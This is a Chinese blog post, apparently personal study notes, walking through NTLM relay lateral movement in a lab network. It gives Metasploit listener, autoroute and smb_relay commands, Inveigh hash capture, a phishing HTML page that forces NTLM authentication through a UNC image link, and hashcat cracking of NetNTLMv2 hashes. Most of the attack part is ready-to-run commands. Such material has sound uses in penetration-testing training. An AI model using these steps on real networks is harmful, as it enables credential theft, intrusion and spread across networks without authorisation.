11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

于 2024-02-21 18:51:47 发布
阅读量833 收藏 8
点赞数 14
分类专栏: 内网安全/渗透 文章标签: 网络安全 内网渗透 横向移动 中继攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65842464/article/details/136210459
版权
本文详细描述了如何通过NTLM中继攻击进行SMB权限提升,包括MSF工具的使用,如CS权限转移至MSF,利用smb_relay模块进行重发攻击,以及Inveigh嗅探和Hash破解的过程。
摘要由CSDN通过智能技术生成

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

5、受控主机输入命令:dir \\192.168.46.166\c$

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截 

 2.1、钓鱼触发

 3、破解密文

前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令   查看所需用户权限的进程号
steal_token 1668  切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992    #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166  kali  取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。

条件:两台主机用户密码一致

1、CS权限转给MSF: 

spawn l-msf

2、MSF: 

监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由: 

run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块: 

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

 Inveigh.exe

2、触发拦截 

dir \\192.168.3.x\c$
 2.1、钓鱼触发

http://192.168.3.31/1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

 3、破解密文

 hashcat -m 5600 hash pass.txt --show
++⁠⁠
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(Net-)NTLM Relay(
Canterlot的博客
09-06 652
详细介绍了 NTLM Relay(ntlm)的原理和相关工具的使用方法
使用relay模式binlog,实现自动化
sinoimage的博客
08-20 375
背景:每天有外部来的binlog文件,需要在本地的MySQL环境做,在上次完成后Slave_SQL_Running_State显示Slave has read all relay log; waiting for more updates 。随后将新的binlog文件命名未relay文件并按序号后延,也编辑了index文件添加新的relay文件编号,但不会继续,每次需要新reset slave -> change master to,故编写此脚本来自动。 #!bin/bash.
横向移动—NTLM-Relay&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 1043
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
安全第一百三十四天
B_l_a_nk的博客
08-21 289
1、横向移动-NTLM-Relay To SMB 2、横向移动-NTLM-Inveigh Hash破解
渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay
m0_62207170的博客
05-01 1043
渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay
第68天:内安全-横向PTH&PTK&PTT哈希票据传递1
08-03
安全是一个要的议题,尤其是在企业环境中,域横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部络...
红队内攻防渗透:内渗透之内对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
最新发布
06-22
首先,横向移动是内渗透的关键步骤,是指攻击者在获取初步立足点后,如何在内中悄无声息地扩大控制范围。这需要对络拓扑、权限结构和安全策略有深入理解。在实施过程中,攻击者可能会利用弱密码、零日漏洞或...
EWS-for-iOS:iOS的 Exchange Web Service (EWS) 框架
05-10
2. **身份验证机制**:框架支持NTLM、基本认证和OAuth 2.0,以确保安全连接到Exchange Server。 3. **异步操作**:大多数EWS操作都是异步进行的,以避免阻塞UI并提高用户体验。 4. **错误处理**:提供丰富的错误...
Windows下LM-Hash与NTLM-Hash
02-11
文档描述了Windows下LM HASH ,NTLM HASH生成原理和规则。 并利用Python脚本进行模拟。 详细描述了 挑战/响应模式(鉴权协议)的原理 详细描述了NTLM SMB通信流程 对内渗透入门感兴趣的一定下载
Responder 利用
子曰小玖的博客
04-24 3255
总结与思考: 1. 利用Responder进行NTLMV2哈希的窃取 2. 使用Responder进行中继攻击成功后进行代码执行 3. 使用Responder进行凭证/哈希破解 4. 使用Responder进行快速SMB扫描 5. 使用Responder配合MSF反弹shell 6. LLMNR/NBT-NS攻击的防御 概述: Responder是对渗透测试工作者来说一个很棒的工...
NTLM-relay攻击
good good study
03-07 1951
在上一篇笔记中,介绍了ntlm络认证的原理 ——> NTLM络认证协议分析及Net-NTLMhash的获取,我们获取了Net-NTLMhash值,但是我们爆破不出密码,可以使用NTLM-relay攻击,relay就是中继的意思。 NTLM Relay原理 在Client视角下,Attacker是它的服务端,模拟客户端完成访问请求。 在Server视角下,Attacker是它的客户端,伪造客户端完成身份验证。 攻击者所做的事情只是把所有客户端的请求relay到服务端,并把所有服务端.
2021-10-15NTLM中继攻击(ntlm delay)
qq_45290991的博客
10-15 2336
终于结束了,虽然没有毕业后成为一名red进入鹅产,但是到了小产业也感觉很好。齐名虽然年轻,但是朝气蓬勃。 我觉得同事都很开心,搞渗透测试运维也不错驻场。 一、原理 1.1ntlm认证机制 参考资料:Windows本地认证和NTLM认证 总的来说就是windows下有2种认证机制,kerb和ntlm(ntlm又分为第一版本和第二版本),kb用于域内,一般是kb优先用,不行了域内才会开始用ntlm。win2000以后,ntlm认证方式的hash(密码)都会被存入到SAM文件中,域内会存入ntdl。tdl
NTLM Relay利用
qq_18811919的博客
03-07 3416
讲述了多种NTLM Relay的利用方式包括打印机bug以及PetitPotam强制触发NTLM认证方式以及Exchange Relay与ADCS Relay的利用
[内渗透]—NTLM络认证及NTLM-Relay攻击
Sentiment的博客
12-16 1492
Windows认证分为本地认证和络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证而当我们访问同一局域的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的络认证。
【内安全横向移动&NTLM-Relay&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 973
攻击者伪造一个恶意的SMB服务器,当内中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 给 Client2(sqlserver)。Exchange,LLMNR投毒,
攻击
jiangbin00cn的专栏
11-07 7221
攻击是计算机世界黑客常用的攻击方式之一,它的书面定义对不了解密码学的人来说比较抽象。我就通过一个故事来说明它吧!/////////////////////////////////////////故事的分割线/////////////////////////////////////////阿里巴巴和40大盗的故事人物:黑客:阿里巴巴用户:40大盗系统:宝库身份认证:石门故事情节:
渗透测试:内横向移动基础总结
zhangge3663的博客
10-27 4592
作者:WHOAMI,转载于freebuf。 横向移动 在内渗透中,当攻击者获取到内某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内环境,控制域环境下的全部机器。 在这篇文章中,我们来 讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近
渗透,横向移动总结(mimikatz域控)
墨痕诉清风的博客
08-23 2937
前言 通常我们在渗透过程中从外围打点进入内后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内的目标还是拿下尽可能多的主机,这时候选择横向移动的方法就尤为要。今天就对一些常用的横向手法进行一个总结,有不足之处欢迎师傅们进行斧正。 本次实验均在本地搭建靶场进行,靶场拓扑图如下: 利用windows远程连接命令 ipc连接 IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的
2019年Q4安全季刊:ATT&CK与漏洞深度解析
例如,《Windows内协议学习NTLM篇之NTLM漏洞概述》讲解了NTLM协议的安全风险;《以攻擊者的角度制定防禦策略》提供了从攻击者角度看安全防御的思考;《如何利用开源工具收集美国关键基础设施情报》探讨了情报收集...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

++⁠⁠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值